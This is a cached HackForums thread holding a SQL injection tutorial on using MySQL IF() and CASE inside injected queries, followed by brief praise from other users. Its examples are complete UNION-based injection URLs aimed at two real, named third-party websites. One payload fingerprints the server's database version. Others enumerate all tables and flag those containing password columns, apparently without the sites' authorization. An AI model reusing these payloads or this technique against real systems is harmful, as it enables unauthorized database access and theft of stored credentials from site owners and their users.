<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3588441" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3588441" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3588441</a>. It is a snapshot of the page as it appeared on 25 Mar 2014 02:10:23 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3588441" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:HK2IVR1yfZkJ:www.hackforums.net/showthread.php%3Ftid%3D3588441&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] Using Flow Control functions/statements in SQLi - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] Using Flow Control functions/statements in SQLi"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3588441"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-24-2014, 06:10 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] Using Flow Control functions/statements in SQLi</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3588441" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/rating.js"></script><div id="success_rating_3588441" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3588441"><li style="width: 0%" class="current_rating" id="current_rating_3588441">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3588441&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3588441&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3588441&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3588441&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3588441&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3588441" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3588441_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3588441" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3588441&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3588441");
// -->
</script><div><strong>[SQLi tutorial] Using Flow Control functions/statements in SQLi</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid33641147" id="pid33641147"></a><table class="tborder" style="border-top-width: 0; " id="post_33641147" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-30-2013, 03:32 PM <span id="edited_by_33641147"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33641147#pid33641147">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,164<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33641147">MySQL
 has different Flow Control functions/statements. Flow Control 
function/statement returns value based on each row processed by the 
query executed. The returned value is a result of condition evaluated.<br><br><span style="font-size: x-large;"><span style="color: #FFD700;">IF() function</span></span><br><br>MySQL IF() function returns a value based on a condition. Syntax is as follows:<br><span style="font-weight: bold;"><span style="color: #32CD32;"><br>IF(</span></span><span style="color: #FFD700;">some_expression</span>, <span style="color: #32CD32;">result_if_some_expression_is_TRUE</span>, <span style="color: #00BFFF;">result_if_some_expression_is_FALSE</span><span style="font-weight: bold;"><span style="color: #32CD32;">)</span></span><br><br>If <span style="color: #FFD700;">some_expression</span> evaluates to TRUE (and <span style="color: #FFD700;">some_expression</span> is not NULL), the IF function returns the <span style="color: #32CD32;">result_if_some_expression_is_TRUE</span>, otherwise it returns <span style="color: #00BFFF;">result_if_some_expression_is_FALSE</span>. The IF function can return a numeric or a string, depending on how it is used.<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT IF(5&gt;3&nbsp;&nbsp;&nbsp;&nbsp;, 'yes' , 'no') --&gt; yes<br>SELECT IF('a'='b', 'yes' , 'no') --&gt; no<br>SELECT IF(1=2&nbsp;&nbsp;&nbsp;&nbsp;, 1&nbsp;&nbsp;&nbsp;&nbsp; , 0&nbsp;&nbsp; ) --&gt; 0</code></div></div><br><span style="color: #FFA500;">SQLi example:</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 0 UNION SELECT 1,(SELECT if( ASCII(SUBSTR(VERSION(),1,1)=53), 'it 
is version 5','it is not version 5' )),3,4,5,6,7,8,9,10,11,12,13,14,15--
 -</code></div></div><br>Because checked expression (<span style="color: #32CD32;">ASCII(SUBSTR(VERSION(),1,1)=53</span>) is TRUE we will get<span style="color: #FFD700;"> it is version 5 </span>on screen.<br><br>When using function IF() we must be careful not to confuse it with IF statement.<br><br><br><br><span style="font-size: x-large;"><span style="color: #FFD700;">CASE statement</span></span><br><br>It has syntax as follows:<br>CASE<br>WHEN <span style="color: #FFD700;">some_condition</span> THEN <span style="color: #32CD32;">result_if_some_condition_is_TRUE</span><br>WHEN <span style="color: #FFD700;">some_other_condition</span> THEN <span style="color: #32CD32;">result_if_some_other_condition_is_TRUE</span><br>ELSE <span style="color: #00BFFF;">result_in_all_other_cases</span><br>END<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT CASE<br>&nbsp;&nbsp; WHEN version()=5 THEN<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'version is 5'<br>&nbsp;&nbsp; WHEN version()=4 THEN<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'version is 4'<br>&nbsp;&nbsp; ELSE<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'version not 4 or 5'<br>END</code></div></div><br><span style="color: #FFA500;">SQLi example:</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 0 UNION SELECT 1,(SELECT CASE WHEN 
(ASCII(SUBSTR(VERSION(),1,1))=53) THEN 'it is version 5' ELSE 'it is not
 version 5' END),3,4,5,6,7,8,9,10,11,12,13,14,15-- -</code></div></div><br>We will get result <span style="color: #FFD700;">it is version 5 </span>on screen.<br><br><hr><br>In challenge <a href="http://www.hackforums.net/showthread.php?tid=3562988" target="_blank"><span style="text-decoration: underline;"><span style="font-size: medium;">#50</span></span></a> we have to display all tables in database and put a label <span style="color: #32CD32;">*** pass ***</span> beside each table where column <span style="color: #FFD700;">password</span> exists.<br><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/72268542cb5668883a0b6e0edc7321b1.jpg" alt="[Image: 72268542cb5668883a0b6e0edc7321b1.jpg]" border="0"><br><br>How can we do that? Using <span style="color: #FFD700;">CASE statement</span> like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.ece.com.tw/p-detail.php?id=12 and 0 UNION SELECT 1,2,3,4,<br>(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (0x00) in 
(@x:=concat(@x,0x3c62723e,@tbl:=table_name,<br>(Select CASE WHEN ( 
(select count(*) from information_schema.columns where table_name=@tbl 
and column_name like 0x257061737325)&gt;0) THEN 
0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e
​3c666f6e7420636f6c6f723d626c75653e else 0x00 END)))))x), 
6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
-&amp;cID=2&amp;uID=1</code></div></div><br>or using <span style="color: #FFD700;">IF() function</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.ece.com.tw/p-detail.php?id=12 and 0 UNION SELECT 1,2,3,4,<br>(select
 (@x) from (select (@x:=0x00),(select (0) from 
(information_schema.tables) where (0x00) in 
(@x:=concat(@x,0x3c62723e,@tbl:=table_name,<br>(Select IF(( select 
count(*) from information_schema.columns where table_name=@tbl and 
column_name like 0x257061737325 &gt;0), 
0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a2a2070617373202a2a2a203c2f623e
​3c666f6e7420636f6c6f723d626c75653e, 
0x00))))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
-&amp;cID=2&amp;uID=1</code></div></div><br>Both examples are used <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FF0000;">ONLY </span></span></span>to show you that part of challenge <a href="http://www.hackforums.net/showthread.php?tid=3562988" target="_blank"><span style="text-decoration: underline;"><span style="font-size: medium;">#50</span></span></a> where task was marking all tables with password column with label <span style="color: #32CD32;">*** pass ***</span><br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_33641147"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33641147" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33643755" id="pid33643755"></a><table class="tborder" style="margin-top: 5px; " id="post_33643755" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-30-2013, 04:38 PM <span id="edited_by_33643755"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33643755#pid33643755">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=410740"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/avatar_410740.gif" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=410740"><span class="group29">Grizz</span></a></span></strong> <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=410740" title="Away"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_away.gif" alt="Away" border="0"></a><br><span class="smalltext">Bitch please, b-b-bitch please<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 199<br>Posts: 4,789<br>Joined: Jul 2010<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=410740"><strong class="reputation_positive">468</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33643755">Good description on the inner-workings of an SQLi.</div><div class="post_meta" id="post_meta_33643755"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://twitter.com/GrizzTheGhost" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=410740" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33643755" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33644822" id="pid33644822"></a><table class="tborder" style="margin-top: 5px; " id="post_33644822" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-30-2013, 05:28 PM <span id="edited_by_33644822"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33644822#pid33644822">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1827801"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/redglow.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1827801"><span class="group2">kierobero</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 7<br>Posts: 58<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1827801"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33644822">Great Job again and again, thanks for all ! :)</div><div class="post_meta" id="post_meta_33644822"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1827801" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33644822" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33650964" id="pid33650964"></a><table class="tborder" style="margin-top: 5px; " id="post_33650964" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-01-2013, 12:14 AM <span id="edited_by_33650964"><span class="smalltext">(This post was last modified: 07-01-2013 12:15 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852536">Suved</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33650964#pid33650964">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852536"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/avatar_852536.jpg" alt="" height="100" width="85"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852536"><span class="group9">Suved</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Living Normal LIFE<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 53<br>Posts: 855<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=852536"><strong class="reputation_positive">39</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33650964">^That part of challenge is simple.<br>The real deal is numbering tables.</div><div class="post_meta" id="post_meta_33650964"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=852536" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33650964" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33666280" id="pid33666280"></a><table class="tborder" style="margin-top: 5px; " id="post_33666280" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-01-2013, 04:26 PM <span id="edited_by_33666280"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33666280#pid33666280">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1873414"><span class="group7">urez</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Exiled<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/spacer.gif" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 2<br>Posts: 108<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1873414"><strong class="reputation_negative">-19</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33666280">good job, read this but forgot to post, you deserve to be recognized more for your work</div><div class="post_meta" id="post_meta_33666280"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1873414" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33666280" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33666334" id="pid33666334"></a><table class="tborder" style="margin-top: 5px; " id="post_33666334" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-01-2013, 04:28 PM <span id="edited_by_33666334"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: 